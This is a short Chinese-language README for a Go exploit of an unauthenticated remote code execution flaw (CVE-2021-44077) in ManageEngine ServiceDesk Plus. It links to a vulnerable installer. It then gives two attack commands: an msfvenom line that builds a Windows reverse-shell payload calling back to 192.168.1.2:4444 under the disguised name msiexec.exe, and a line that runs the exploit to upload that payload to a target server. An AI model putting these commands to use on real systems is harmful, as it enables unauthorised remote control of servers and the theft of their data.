此利用程序是针对 Zoho ManageEngine ServiceDesk Plus 低于 11306 版本的未认证远程代码执行漏洞。
您可以在此处找到存在漏洞的软件版本:http://archives.manageengine.com/service-desk/11303/ManageEngine_ServiceDesk_Plus_64bit.exe
我找不到此漏洞的 Golang 版本,因此这里提供一个。我的代码质量不高,使用风险自负。
博客文章:
在当前目录中创建恶意载荷。
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f exe > msiexec.exe
然后,运行利用程序。
go run CVE-2021-44077.go -u "http://192.168.1.3:8080/" -f "/msiexec.exe"
-u 是存在漏洞的 URL -f 是您的恶意文件